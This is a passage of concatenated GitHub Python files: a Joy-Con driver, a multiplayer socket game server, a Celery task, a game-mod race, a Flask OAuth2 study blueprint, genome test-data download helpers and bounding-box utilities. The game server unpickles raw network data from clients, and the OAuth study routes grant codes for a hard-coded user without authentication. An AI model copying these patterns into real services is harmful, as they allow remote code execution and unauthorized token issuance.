self.is_left() else -1)\n\n def get_status(self) -> dict:\n return {\n \"battery\": {\n \"charging\": self.get_battery_charging(),\n \"level\": self.get_battery_level(),\n },\n \"buttons\": {\n \"right\": {\n \"y\": self.get_button_y(),\n \"x\": self.get_button_x(),\n \"b\": self.get_button_b(),\n \"a\": self.get_button_a(),\n \"sr\": self.get_button_right_sr(),\n \"sl\": self.get_button_right_sl(),\n \"r\": self.get_button_r(),\n \"zr\": self.get_button_zr(),\n },\n \"shared\": {\n \"minus\": self.get_button_minus(),\n \"plus\": self.get_button_plus(),\n \"r-stick\": self.get_button_r_stick(),\n \"l-stick\": self.get_button_l_stick(),\n \"home\": self.get_button_home(),\n \"capture\": self.get_button_capture(),\n \"charging-grip\": self.get_button_charging_grip(),\n },\n \"left\": {\n \"down\": self.get_button_down(),\n \"up\": self.get_button_up(),\n \"right\": self.get_button_right(),\n \"left\": self.get_button_left(),\n \"sr\": self.get_button_left_sr(),\n \"sl\": 
self.get_button_left_sl(),\n                \"l\": self.get_button_l(),\n                \"zl\": self.get_button_zl(),\n            }\n        },\n        \"analog-sticks\": {\n            \"left\": {\n                \"horizontal\": self.get_stick_left_horizontal(),\n                \"vertical\": self.get_stick_left_vertical(),\n            },\n            \"right\": {\n                \"horizontal\": self.get_stick_right_horizontal(),\n                \"vertical\": self.get_stick_right_vertical(),\n            },\n        },\n        \"accel\": self.get_accels(),\n    }\n\n    def disconnect_device(self):\n        self._write_output_report(b'\\x01', b'\\x06', b'\\x00')\n\n\nif __name__ == '__main__':\n    import pyjoycon.device as d\n    ids = d.get_L_id() if None not in d.get_L_id() else d.get_R_id()\n\n    if None not in ids:\n        joycon = JoyCon(*ids)\n        lamp_pattern = 0\n        while True:\n            print(joycon.get_status())\n            joycon.set_player_lamp_on(lamp_pattern)\n            lamp_pattern = (lamp_pattern + 1) & 0xf\n            time.sleep(0.2)\n","repo_name":"redphx/joydance","sub_path":"pycon/joycon.py","file_name":"joycon.py","file_ext":"py","file_size_in_byte":16582,"program_lang":"python","lang":"en","doc_type":"code","stars":69,"dataset":"github-code","pt":"63"}
{"seq_id":"5266107129","text":"import socket\nfrom _thread import *\nimport sys\nfrom planet import Planet\nimport pickle\n\nif len(sys.argv)!=3:\n    print(\"usage: \",sys.argv[0],\" 192.168.1.1 5555\")\n    print(\"use your IP address in place of 192.168.1.1 and an open port in place of 5555\")\n    exit()\n    \n#socket allows for incoming connections\n#server = \"192.168.0.110\"\n#port = 5555\nserver = sys.argv[1]\nport = int(sys.argv[2])\n\n#IPV4\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\ntry:\n    s.bind((server,port))\nexcept socket.error as e:\n    print(e)\n\ndef getY(srcobject):\n    return srcobject.position[1]\n\n#instantiate local planets\nearth = Planet()\nearth.size = 10\nearth.position = [0.0,0.0,0.0]\nearth.resources = [32.0,192.0,128.0]\nplanets = [earth]\n\nfor i in range(40):\n    planets = planets+[Planet()]\n\nplanets.sort(key = getY)\n\nfor i in range(41):\n    planets[i].index = i\n\n\n#listen for up to 10 connections\nmaxPlayers = 10\ns.listen(maxPlayers)\nprint(\"Waiting for connection...\")\n\nplayerLock = allocate_lock()\nplayers = 0\nplayerSlots = [False]*maxPlayers\nplayersAt = [-1]*maxPlayers\nmessageQueues = [\"\"]*maxPlayers # I might need a lock\n\ndef threaded_client(conn):\n    global playerSlots\n    global players\n\n    # find our player number so the server can share things between threads\n    playerLock.acquire()\n    players+=1\n    playerNumb=0\n    print(playerSlots)\n    while playerSlots[playerNumb]:\n        playerNumb+=1\n        print(playerNumb)\n    print(playerNumb)\n    playerSlots[playerNumb]=True\n    playerLock.release()\n    \n    conn.send(pickle.dumps(planets))\n    reply = \"\"\n    at = None\n    while True:\n        try:\n            # object truncation occurs if the object is too big to fit\n            data = conn.recv(2048)\n            reply = pickle.loads(data)\n\n            if not data:\n                print(\"Disconnected\")\n                break\n            else:\n                print(\"Recv: \",reply)\n                if(len(reply)==1):\n                    if(reply[0]==\"depart\"):\n                        playersAt[playerNumb] = -1\n                        at = None\n                if(len(reply)==2):\n                    if(reply[0]==\"arrive\"):\n                        at = reply[1]\n                        playersAt[playerNumb] = reply[1]\n                    if(reply[0]==\"listen\"):\n                        at = reply[1]\n                        playersAt[playerNumb] = reply[1]\n                        reply = planets[reply[1]].listen()\n                        if(len(messageQueues[playerNumb])):\n                            reply = messageQueues[playerNumb]\n                            messageQueues[playerNumb] = \"\"\n                if(len(reply)==3):\n                    if(reply[0]==\"talk\"):\n                        print(playerNumb,\" is talking at: \",reply[1],\" saying \",reply[2])\n                        print(playersAt)\n                        print(playerSlots)\n                        print(messageQueues)\n                        
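# Added note: fan this chat line out to every other connected player at the\n                        # same planet; their thread delivers it on their next \"listen\" request.\n                        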
for index in range(maxPlayers):\n                            if index != playerNumb and reply[1] != -1 and playersAt[index] == reply[1] and playerSlots[index]:\n                                print(\"found \",index)\n                                messageQueues[index]+=reply[2]\n                        print(messageQueues)\n                        reply = planets[reply[1]].talk(reply[2])\n                print(\"Sending: \",reply)\n\n            conn.sendall(pickle.dumps(reply))\n        except:\n            print(\"Error in connection loop\")\n            break\n    conn.close()\n    playerLock.acquire()\n    players -=1\n    playerSlots[playerNumb] = False\n    playerLock.release()\n    \nwhile True:\n    # accept() returns a (connection, address) tuple\n    conn, adr = s.accept()\n    print(\"Connected to:\", adr)\n\n    start_new_thread(threaded_client, (conn,))\n    \n","repo_name":"drewmacrae/Orrery","sub_path":"connectorServer.py","file_name":"connectorServer.py","file_ext":"py","file_size_in_byte":3773,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"}
{"seq_id":"27968504695","text":"import json\n\nfrom django_celery_beat.models import PeriodicTask, IntervalSchedule\n\nfrom listam_bot.celery import app\nfrom subscriptions.models import Subscription\nfrom spider import crawl_and_send_new_ads_to_user\n\n\ndef add_crawling_task(subscription_id):\n    schedule, created = IntervalSchedule.objects.get_or_create(\n        every=120,\n        period=IntervalSchedule.SECONDS,\n    )\n\n    PeriodicTask.objects.create(\n        interval=schedule,\n        name=\"Send new ads for subscription {}\".format(subscription_id),\n        task=\"subscriptions.tasks.send_new_ads\",\n        kwargs=json.dumps({\"subscription_id\": subscription_id}),\n    )\n\n\ndef remove_crawling_task(subscription_id):\n    PeriodicTask.objects.filter(\n        name=\"Send new ads for subscription {}\".format(subscription_id)\n    ).delete()\n\n\n@app.task\ndef send_new_ads(subscription_id):\n    subscription = Subscription.objects.get(id=subscription_id)\n    crawl_and_send_new_ads_to_user(\n        chat_id=subscription.chat_id,\n        last_ad=subscription.last_ad,\n        subscription_id=subscription_id,\n    )\n","repo_name":"9z06/listam_bot","sub_path":"subscriptions/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"}
{"seq_id":"1602980720","text":"from ..tools.BaseClasses import baseRace, Skill\nfrom ..tools import DamageTypes\n\nimport es, playerlib, gamethread\nfrom random import randint\n\nclass Predator( baseRace ):\n\tdef __init__( self ):\n\t\tself.WeaponsCanOnlyUse = ['Knife', 'Grenades']\n\n\t\tself.RaceAbbreviation = 'Pred'\n\t\tself.RaceColor = '#black'\n\n\t\tself.RacePrefix = '[K]'\n\t\tself.RaceName = 'Predator'\n\t\tself.RaceTypes = ['humanoid', 'monster', 'alien']\n\t\tself.Coder = 'MrCoolness & Mini Dude'\n\t\tself.UltimateCooldown = 25\n\t\tself.StartingUltimateCooldown = 10\n\n\t\tself.PlayerLimit = 0\n\t\tself.RequiredLevel = 14\n\t\tself.ChangeRaceIndex = 20\n\n\t\tself.SkillList = [\n\t\t\tSkill( 'Poison Blade', 'Your knife attacks slow people!' , 0, 0 ),\n\t\t\tSkill( 'Pounce' , 'Leap towards your enemy.' , 5, 0 ),\n\t\t\tSkill( 'Stealth' , 'You hide well when lurking for prey.' , 5, 0 ),\n\t\t\tSkill( 'Vanish' , 'Your remaining enemies are baffled after your first strike.' , 5, 0 ),\n\t\t\tSkill( 'Gobble' , 'The flesh of your enemy gives you strength.' , 5, 0 ),\n\t\t\tSkill( 'Ravage' , '[Ultimate] You become more vicious.' , 5, 8 )\n\t\t]\n\n\tdef player_spawn( self, ev, skills ):\n\t\twcsPlayer = self.helper.players[ str(ev['userid']) ]\n\n\t\t# lvl = skills['Poison Blade']\n\t\tslow = 0.5\n\t\tself.helper.raceTell( self, wcsPlayer, '#goodPoison Blade #defslows your victims by #good%i#def!' 
% int(slow*100) )\n\n\t\twcsPlayer = self.helper.getPlayer( wcsPlayer )\n\t\twcsPlayer.speed = 1\n\n\t\tlvl = skills['Pounce']\n\t\tif ( lvl > 0 ):\n\t\t\t# slow the player initially\n\t\t\tgamethread.delayed( 2, setattr, ( wcsPlayer, 'speed', 0.5 ) )\n\n\t\t\tmultiplier = 0.5 + ( lvl * 0.5 ) # 300%\n\t\t\tself.helper.raceTell( self, wcsPlayer, '#goodPounce #defcauses you to jump #good%i%% #deffarther.' % int( multiplier*100 ) )\n\n\t\tlvl = skills['Stealth']\n\t\tif ( lvl > 0 ):\n\t\t\tinvis = 0.4 + ( lvl * 0.08 ) # 80%\n\t\t\tself.RaceTools.setColor( wcsPlayer, 1, 1, 1, ( 1 - invis ) )\n\t\t\tself.helper.raceTell( self, wcsPlayer, '#goodStealth #defprovides you with #good%i%% #definvis!' % int( invis*100 ) )\n\n\t\tlvl = skills['Vanish']\n\t\tif ( lvl > 0 ):\n\t\t\tduration = 0.5 + ( lvl * 0.2 )\n\t\t\tself.helper.raceTell( self, wcsPlayer, '#goodVanish #defcauses you to go #good100%% #definvisible for #good%i #defseconds when you attack!' % int( duration ) )\n\n\t\tlvl = skills['Gobble']\n\t\tif ( lvl > 0 ):\n\t\t\tchance = 25 + ( lvl * 5 )\n\t\t\thp = 10 + lvl\n\t\t\tself.helper.raceTell( self, wcsPlayer, '#goodGobble #defgrants a #good%i%% #defchance to gain #good%i #defhealth when you #redattack#def.' % ( chance, hp ) )\n\n\t\tlvl = skills['Ravage']\n\t\tif ( lvl > 0 ):\n\t\t\twcsPlayer.infoPredatorRavage = False\n\n\tdef player_jump( self, ev, skills ):\n\t\twcsPlayer = self.helper.players[ str(ev['userid']) ]\n\n\t\tlvl = skills['Pounce']\n\t\tif ( lvl > 0 ):\n\t\t\tmultiplier = 0.5 + ( lvl * 0.5 )\n\n\t\t\tself.RaceTools.longJump( wcsPlayer, multiplier, 800, 400 )\n\n\t\t\t# x = es.getplayerprop( wcsPlayer, 'CBasePlayer.localdata.m_vecVelocity[0]' )\n\t\t\t# y = es.getplayerprop( wcsPlayer, 'CBasePlayer.localdata.m_vecVelocity[1]' )\n\n\t\t\t# if (\n\t\t\t# \tx < 800 and x > -800 and\n\t\t\t# \ty < 800 and y > -800\n\t\t\t# ):\n\n\t\t\t# \tx *= multiplier\n\t\t\t# \ty *= multiplier\n\n\t\t\t# \tx = max( -400, min( x, 400 ) )\n\t\t\t# \ty = max( -400, min( y, 400 ) )\n\n\t\t\t# \tif (\n\t\t\t# \t\tx <= 1200 and x >= -1200 and\n\t\t\t# \t\ty <= 1200 and y >= -1200\n\t\t\t# \t ):\n\n\t\t\t# \t\t# es.msg( (x,y) )\n\t\t\t# \t\t# for some reason he goes to high push him down a bit\n\t\t\t# \t\tself.RaceTools.pushToPoint( player, x, y, 0 )\n\t\t\t# \t\t# self.RaceTools.pushToPoint( player, x, y, -25 )\n\n\tdef player_air( self, ev, skills ):\n\t\twcsPlayer = self.helper.players[ str(ev['userid']) ]\n\n\t\tlvl = skills['Pounce']\n\t\tif ( lvl > 0 ):\n\t\t\twcsPlayer.speed += 0.5\n\n\tdef player_land( self, ev, skills ):\n\t\twcsPlayer = self.helper.players[ str(ev['userid']) ]\n\n\t\tlvl = skills['Pounce']\n\t\tif ( lvl > 0 ):\n\t\t\twcsPlayer.speed -= 0.5\n\n\tdef player_attack( self, ev, skills ):\n\t\twcsAttacker = self.helper.players[ str(ev['attacker']) ] # us\n\t\twcsVictim = self.helper.players[ str(ev['userid' ]) ]\n\n\t\t# apply the posion blade affect\n\t\tself.RaceTools.slowPlayer( wcsVictim, 0.5, 1 )\n\n\t\tlvl = skills['Vanish']\n\t\tif ( lvl > 0 ):\n\t\t\tduration = 0.5 + ( lvl * 0.2 )\n\n\t\t\toldAlpha = wcsAttacker.alpha\n\n\t\t\t# whatever his alpha is, remove it\n\t\t\twcsAttacker.alpha -= oldAlpha\n\n\t\t\t# make is so when someones cursor is over you, it doesn't show your name\n\t\t\tes.setplayerprop( wcsAttacker, 'CBaseAnimating.m_nHitboxSet', 2 )\n\n\t\t\tself.helper.raceTell( self, wcsAttacker, '#goodVanish #defhides you for #good%i #defseconds!' 
% int( duration ) )\n\n\t\t\t# then delay to set it back\n\t\t\tgamethread.delayed( duration, self.VanishOff, ( wcsAttacker, oldAlpha ) )\n\n\t\t\t# if you set this to '1' when people look at you, it will crash their game\n\t\t\tgamethread.delayed( duration, es.setplayerprop, ( wcsAttacker, 'CBaseAnimating.m_nHitboxSet', 0 ) )\n\n\t\tlvl = skills['Gobble']\n\t\tif ( lvl > 0 ):\n\t\t\tchance = 25 + ( lvl * 5 )\n\t\t\trand = randint( 1, 100 )\n\t\t\tif ( chance >= rand ):\n\t\t\t\thp = 10 + lvl\n\t\t\t\twcsAttacker.player.health += hp\n\n\t\t\t\tself.helper.raceTell( self, wcsAttacker, '#goodGobble #defgains you #good%i #defhealth!' % hp )\n\n\t\tlvl = skills['Ravage']\n\t\tif ( lvl > 0 and wcsAttacker.infoPredatorRavage ):\n\t\t\tdamage = ev['dmg_health']\n\n\t\t\t# range of the bonus damage\n\t\t\tbonusDamage = randint( lvl*5, lvl*10 )\n\n\t\t\tself.helper.raceTell( self, wcsAttacker, '#goodRavage #defdeals #good%i #defbonus damage to #name%s#def.' % ( bonusDamage, wcsVictim.player.name ) )\n\t\t\tself.helper.raceTell( self, wcsVictim , '#name%s #defdeals #bad%i #defravage damage!' % ( wcsAttacker.player.name, bonusDamage ))\n\n\t\t\treturn ( damage + bonusDamage )\n\n\tdef player_hurt( self, ev, skills ):\n\t\tdamageType = ev['damage_type']\n\n\t\t# if the damage type is fall damage, prevent it\n\t\tif ( damageType & DamageTypes.DMG_FALL ):\n\t\t\treturn 0\n\n\tdef player_ultimate( self, ev, skills ):\n\t\twcsPlayer = self.helper.players[ str(ev['userid']) ]\n\n\t\tlvl = skills['Ravage']\n\t\tif ( lvl > 0 ):\n\n\t\t\tduration = lvl\n\t\t\tdamage = lvl * 10\n\n\t\t\tself.helper.raceTell( self, wcsPlayer, '#goodRavage #defgrants you #redup to #good%i #defbonus damage #redrandomly #deffor #good%i #defseconds!' % ( damage, duration ) )\n\n\t\t\t# turn it on\n\t\t\twcsPlayer.infoPredatorRavage = True\n\n\t\t\t# turn it off\n\t\t\tgamethread.delayed( duration, setattr, ( wcsPlayer, 'infoPredatorRavage', False ) )\n\n\t\t\treturn True\n\n\tdef VanishOff( self, wcsPlayer, oldAlpha ):\n\t\twcsPlayer.alpha += oldAlpha  # no idea how to perform this operation programmatically\n","repo_name":"DerrikMilligan/CounterStrike-Warcraft-Mod","sub_path":"races/Predator.py","file_name":"Predator.py","file_ext":"py","file_size_in_byte":6688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"}
{"seq_id":"15569985196","text":"from flask import Blueprint, request, session, url_for\nfrom flask import render_template, redirect, jsonify\nfrom authlib.oauth2.rfc6749.grants.authorization_code import AuthorizationCodeGrant\nfrom .oauth2 import oauth_server\n\nfrom .libs.client_factory import ClientFactory\nfrom .model import User\nfrom ..app import db\n\nfrom typing import TYPE_CHECKING\n\nif TYPE_CHECKING:\n    from authlib.integrations.flask_oauth2.authorization_server import AuthorizationServer\n    from authlib.oauth2.rfc6749.wrappers import OAuth2Request\n    from flask.wrappers import Response\n\nbp = Blueprint(\"index\", __name__, url_prefix=\"/index\")\n\n\n@bp.route(\"\", methods=(\"GET\", \"POST\"))\ndef index():\n    return jsonify(message='index')\n\n\n@bp.route(\"/client\", methods=(\"POST\",))\ndef add_client():\n    client = ClientFactory.get_client(client_name=\"test002\")\n\n    db.session.add(client)\n    db.session.commit()\n\n    return jsonify(message='index')\n\n\n@bp.route(\"/auth\", methods=(\"POST\",))\ndef auth():\n    # r = server.create_oauth2_request(request)\n\n    return oauth_server.create_authorization_response(request)\n\n\n
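# Added note (assumption): a typical authorization-code exchange against these routes\n# would first fetch a code and then trade it for a token; hostname, port and parameter\n# names below are illustrative only, not taken from this repo:\n#\n#   curl -X POST http://localhost:5000/index/grant/client_secret_post -d grant_type=authorization_code -d code=<CODE> -d client_id=<ID> -d client_secret=<SECRET>\n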
methods=(\"POST\",))\ndef get_grant_code():\n user = User.query.get(1)\n authorization_code_grant: AuthorizationCodeGrant = oauth_server.get_consent_grant(\n end_user=user, # DB에 존재하는 사용자를 넣어준다.\n # request=request # 요청 데이터 그대로 넣어준다.\n )\n\n return jsonify(code=authorization_code_grant.generate_authorization_code())\n\n\n@bp.route(\"/grant/auth\", methods=(\"POST\",))\ndef get_grant_auth():\n user = User.query.get(1)\n grant: AuthorizationCodeGrant = oauth_server.get_consent_grant(end_user=user)\n\n response: Response = oauth_server.create_authorization_response(grant_user=user)\n\n return jsonify(\n status=response.status,\n redirect_uri=response.location,\n code=grant.generate_token(),\n )\n\n\n@bp.route(\"/grant/client_secret_post\", methods=(\"POST\",))\ndef get_grant_token():\n user = User.query.get(1)\n # auth를 통해 token을 발급받기 위해선 client secret도 필요함\n token_response = oauth_server.create_token_response(request=request)\n print(token_response)\n\n return token_response\n\n\n@bp.route(\"/grant\", methods=(\"POST\",))\ndef grant():\n \"\"\" 인증(auth)하기 전에 grant 설정 필요한 듯 \"\"\"\n\n # E.g :: 요청 데이터에 들어있는 사용자를 검증한다.\n user = User.query.get(1)\n\n # AuthorizationCodeGrant, 방식으로 인증된다.\n authorization_code_grant: AuthorizationCodeGrant = oauth_server.get_consent_grant(\n end_user=user, # DB에 존재하는 사용자를 넣어준다.\n # request=request # 요청 데이터 그대로 넣어준다.\n )\n redirec_uri = authorization_code_grant.validate_authorization_request()\n authorization_response = authorization_code_grant.create_authorization_response(\n redirect_uri=redirec_uri,\n grant_user=user\n )\n validate_token_request = authorization_code_grant.validate_token_request()\n\n print(\"*\" * 10)\n print(redirec_uri)\n print(authorization_response)\n print(validate_token_request)\n print(\"*\" * 10)\n\n # authorization_code_grant.create_token_response()\n\n return jsonify(index=\"template\")\n\n# oauth_request: OAuth2Request = oauth_server.create_oauth2_request(request=request)\n","repo_name":"jak010/study-flaskoauth-server","sub_path":"src/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":3347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"36322326438","text":"#!/usr/bin/env python3\n\"\"\"\nNote: This would look so much better replaced by XML or at least JSON. But\n is not worth to do it for now.\n\"\"\"\n\nimport os\nimport gzip\nimport urllib.request, urllib.error, urllib.parse\nimport logging\n\n\nclass LargeTestsData(object):\n \"\"\"\n Large index tests use quite big datasets. 
Make sure these\n    are present before starting the time-consuming tests.\n    \"\"\"\n\n    def __init__(self,bt2_path=''):\n        self.data_dir = 'big_data'\n        curr_path = os.path.realpath(bt2_path)\n\n        curr_path = os.path.join(curr_path,'scripts')\n        curr_path = os.path.join(curr_path,'test')\n        self.data_dir_path = os.path.join(curr_path,self.data_dir)\n        self.reads_dir_path = os.path.join(curr_path,'reads')\n\n        try:\n            os.stat(self.data_dir_path)\n        except:\n            logging.error(\"Cannot find the working datadir %s!\" % self.data_dir_path)\n            raise\n\n        self.genomes = dict()\n        self.genomes['human'] = dict()\n        hm = self.genomes['human']\n        hm['link'] = \"ftp://hgdownload.cse.ucsc.edu/goldenPath/hg19/chromosomes/\"\n        hm['ref_name'] = 'human.fa'\n        hm['chromosomes'] = []\n        chromosomes = hm['chromosomes']\n        for i in range(1,22):\n            chromosomes.append('chr%d' % i)\n        chromosomes.extend(['chrX', 'chrY', 'chrM'])\n\n        self.genomes['mouse'] = dict()\n        ms = self.genomes['mouse']\n        ms['link'] = \"ftp://hgdownload.cse.ucsc.edu/goldenPath/rn4/chromosomes\"\n        ms['ref_name'] = 'mouse.fa'\n        ms['chromosomes'] = []\n        chromosomes = ms['chromosomes']\n        for i in range(1,21):\n            chromosomes.append('chr%d' % i)\n        chromosomes.extend(['chrX', 'chrM'])\n\n        self.joint_genomes = dict()\n        self.joint_genomes['ms_hum'] = dict()\n        mh = self.joint_genomes['ms_hum']\n        mh['link'] = None\n        mh['ref_name'] = 'ms_hum.fa'\n        mh['genomes'] = ['human','mouse']\n\n        self.init_data()\n\n\n\n    def init_data(self):\n        \"\"\" Try and init the data we need.\n        \"\"\"\n        for genome,gdata in list(self.genomes.items()):\n            gn_path = os.path.join(self.data_dir_path,genome)\n            gn_fasta = os.path.join(gn_path,gdata['ref_name'])\n            if not os.path.exists(gn_fasta):\n                self._get_genome(genome)\n                self._build_genome(genome)\n\n        for genome,gdata in list(self.joint_genomes.items()):\n            gn_path = os.path.join(self.data_dir_path,genome)\n            gn_fasta = os.path.join(gn_path,gdata['ref_name'])\n            if not os.path.exists(gn_fasta):\n                self._build_joint_genome(genome)\n\n\n\n    def _get_genome(self,genome):\n        g = self.genomes[genome]\n        gn_path = os.path.join(self.data_dir_path,genome)\n\n        if not os.path.exists(gn_path):\n            os.mkdir(gn_path)\n\n        logging.info(\"Downloading genome: %s \" % genome)\n\n        for chrs in g['chromosomes']:\n            chr_file = chrs + \".fa.gz\"\n            fname = os.path.join(gn_path,chr_file)\n\n            if os.path.exists(fname):\n                logging.info(\"Skip %s (already present)\" % chr_file)\n                continue\n\n            uri = g['link'] + r\"/\" + chr_file\n            logging.info(\"file: %s\" % chr_file)\n\n            try:\n                f = open(fname,'wb')\n                u = urllib.request.urlopen(uri)\n                f.write(u.read())\n            except:\n                f.close()\n                os.remove(fname)\n                os.close(u.fileno())\n                raise\n            else:\n                os.close(u.fileno())\n                u.close()\n                f.close()\n\n\n\n    def _build_genome(self,genome):\n        g = self.genomes[genome]\n        gn_path = os.path.join(self.data_dir_path,genome)\n        gn_fasta = os.path.join(gn_path,g['ref_name'])\n\n        logging.info(\"Building fasta file for genome: %s\" % genome)\n\n        f_gn = open(gn_fasta,'wb')\n\n        for chrs in g['chromosomes']:\n            chr_file = chrs + \".fa.gz\"\n            fname = os.path.join(gn_path,chr_file)\n\n            try:\n                f_chr = gzip.open(fname,'rb')\n                f_gn.write(f_chr.read())\n            except:\n                f_chr.close()\n                f_gn.close()\n                os.remove(gn_fasta)\n                raise\n            else:\n                f_chr.close()\n\n        f_gn.close()\n\n\n\n    def _build_joint_genome(self,genome):\n        jg = self.joint_genomes[genome]\n        jgn_path = os.path.join(self.data_dir_path,genome)\n        jgn_fasta = os.path.join(jgn_path,jg['ref_name'])\n\n        if not os.path.exists(jgn_path):\n            os.mkdir(jgn_path)\n\n        logging.info(\"Building fasta file for 
genome: %s\" % genome)\n\n f_jg = open(jgn_fasta,'wb')\n for g in jg['genomes']:\n gn_path = os.path.join(self.data_dir_path,g)\n fasta_file = os.path.join(gn_path,self.genomes[g]['ref_name'])\n try:\n fin = open(fasta_file,'rb')\n f_jg.write(fin.read())\n except:\n fin.close()\n f_jg.close()\n os.remove(jgn_fasta)\n raise\n else:\n fin.close()\n\n f_jg.close()\n\n\n\nclass ExampleData(object):\n \"\"\" The example data.\n \"\"\"\n\n def __init__(self,bt2_path=''):\n curr_path = os.path.realpath(bt2_path)\n curr_path = os.path.join(curr_path,'example')\n self.index_dir_path = os.path.join(curr_path,'index')\n self.reads_dir_path = os.path.join(curr_path,'reads')\n self.ref_dir_path = os.path.join(curr_path,'reference')\n\n try:\n os.stat(curr_path)\n except:\n logging.error(\"Cannot find the example datadir %s!\" % curr_path)\n raise\n","repo_name":"BenLangmead/bowtie2","sub_path":"scripts/test/btdata.py","file_name":"btdata.py","file_ext":"py","file_size_in_byte":5870,"program_lang":"python","lang":"en","doc_type":"code","stars":585,"dataset":"github-code","pt":"63"} +{"seq_id":"74207189960","text":"\"\"\" This module contains utility functions relating to bounding box\n calculations. This includes deriving a bounding box from an input GeoJSON\n shape file.\n\n Some of the functions in this module were written instead of using\n [the shapely Python package](https://shapely.readthedocs.io/en/latest/),\n as `shapely` does not handle antimeridian crossing when determining an\n encompassing bounding box of a GeoJSON input. The\n [GeoJSON specification](https://datatracker.ietf.org/doc/html/rfc7946#section-3.1.3)\n encourages users to split GeoJSON at the antimeridian, however, this is not\n enforced. When a user specifies a GeoJSON shape that crosses the\n antimeridian, HOSS will use an encompassing bounding box that also crosses\n the antimeridian.\n\n\"\"\"\nfrom collections import namedtuple\nfrom logging import Logger\nfrom typing import Dict, List, Optional, Tuple, Union\nimport json\n\nfrom harmony.message import Message\nfrom harmony.util import Config, download\nimport numpy as np\n\nfrom hoss.exceptions import InvalidInputGeoJSON, UnsupportedShapeFileFormat\n\n\nAggCoordinates = List[Tuple[float]]\nBBox = namedtuple('BBox', ['west', 'south', 'east', 'north'])\nCoordinates = Union[List[float], List[List[float]], List[List[List[float]]],\n List[List[List[List[float]]]]]\nGeoJSON = Union[Dict, List]\n\n\ndef get_harmony_message_bbox(message: Message) -> Optional[BBox]:\n \"\"\" Try to retrieve a bounding box from an input Harmony message. 
If there\n is no bounding box, return None.\n\n \"\"\"\n if message.subset is not None and message.subset.bbox is not None:\n bounding_box = BBox(*message.subset.process('bbox'))\n else:\n bounding_box = None\n\n return bounding_box\n\n\ndef get_request_shape_file(message: Message, working_dir: str,\n adapter_logger: Logger,\n adapter_config: Config) -> str:\n \"\"\" This helper function downloads the file specified in the input Harmony\n message via: `Message.subset.shape.href` and returns the local file\n path.\n\n \"\"\"\n if message.subset is not None and message.subset.shape is not None:\n if message.subset.shape.type != 'application/geo+json':\n raise UnsupportedShapeFileFormat(message.subset.shape.type)\n\n shape_file_url = message.subset.shape.process('href')\n adapter_logger.info('Downloading request shape file')\n local_shape_file_path = download(shape_file_url, working_dir,\n logger=adapter_logger,\n access_token=message.accessToken,\n cfg=adapter_config)\n else:\n local_shape_file_path = None\n\n return local_shape_file_path\n\n\ndef get_shape_file_geojson(local_shape_file_path: str) -> GeoJSON:\n \"\"\" Retrieve the shape file GeoJSON from the downloaded shape file provided\n by the Harmony request.\n\n \"\"\"\n with open(local_shape_file_path, 'r', encoding='utf-8') as file_handler:\n geojson_content = json.load(file_handler)\n\n return geojson_content\n\n\ndef get_geographic_bbox(geojson_input: GeoJSON) -> Optional[BBox]:\n \"\"\" This function takes a GeoJSON input and extracts the longitudinal and\n latitudinal extents from it. These extents describe a bounding box that\n minimally encompasses the specified shape.\n\n This function should be used in cases where the data within the granule\n are geographic. Some projections, particularly polar projections, will\n require further refinement of the GeoJSON shape.\n\n In the function below `contiguous_bboxes` and `contiguous_bbox` refer\n to bounding boxes that do not cross the antimeridian. 
Although, the\n GeoJSON specification recommends that GeoJSON shapes should be split to\n avoid crossing the antimeridian, user-supplied shape files may not\n conform to this recommendation.\n\n \"\"\"\n if 'bbox' in geojson_input:\n return get_bounding_box_lon_lat(geojson_input['bbox'])\n\n grouped_coordinates = aggregate_all_geometries(geojson_input)\n\n if len(grouped_coordinates) == 0:\n return None\n\n contiguous_bbox = get_contiguous_bbox(grouped_coordinates)\n antimeridian_bbox = get_antimeridian_bbox(grouped_coordinates)\n\n bbox_south, bbox_north = get_latitude_range(contiguous_bbox,\n antimeridian_bbox)\n\n if antimeridian_bbox is None:\n bbox_west = contiguous_bbox.west\n bbox_east = contiguous_bbox.east\n elif contiguous_bbox is None:\n bbox_west = antimeridian_bbox.west\n bbox_east = antimeridian_bbox.east\n elif (\n bbox_in_longitude_range(contiguous_bbox, -180, antimeridian_bbox.east)\n or bbox_in_longitude_range(contiguous_bbox, antimeridian_bbox.west, 180)\n ):\n # Antimeridian bounding box encompasses non-antimeridian crossing\n # bounding box\n bbox_west = antimeridian_bbox.west\n bbox_east = antimeridian_bbox.east\n elif ((antimeridian_bbox.east - contiguous_bbox.west)\n < (contiguous_bbox.east - antimeridian_bbox.west)):\n # Distance from contiguous bounding box west to antimeridian bounding\n # box east is shorter than antimeridian bounding box west to contiguous\n # bounding box east\n bbox_west = contiguous_bbox.west\n bbox_east = antimeridian_bbox.east\n else:\n # Distance from antimeridian bounding box west to contiguous bounding\n # box east is shorter than contiguous bounding box west to antimeridian\n # bounding box east\n bbox_west = antimeridian_bbox.west\n bbox_east = contiguous_bbox.east\n\n return BBox(bbox_west, bbox_south, bbox_east, bbox_north)\n\n\ndef get_contiguous_bbox(\n grouped_coordinates: List[AggCoordinates]\n) -> Optional[BBox]:\n \"\"\" Retrieve a bounding box that encapsulates all shape file geometries\n that do not cross the antimeridian.\n\n \"\"\"\n contiguous_bboxes = [[min(grouped_lons), min(grouped_lats),\n max(grouped_lons), max(grouped_lats)]\n for grouped_lons, grouped_lats in grouped_coordinates\n if len(grouped_lons) == 1\n or not crosses_antimeridian(grouped_lons)]\n\n if len(contiguous_bboxes) > 0:\n aggregated_extents = list(zip(*contiguous_bboxes))\n contiguous_bbox = BBox(min(aggregated_extents[0]),\n min(aggregated_extents[1]),\n max(aggregated_extents[2]),\n max(aggregated_extents[3]))\n else:\n contiguous_bbox = None\n\n return contiguous_bbox\n\n\ndef get_antimeridian_bbox(\n grouped_coordinates: List[AggCoordinates]\n) -> Optional[BBox]:\n \"\"\" Retrieve a bounding box that encapsulates all shape file geometries\n that cross the antimeridian. 
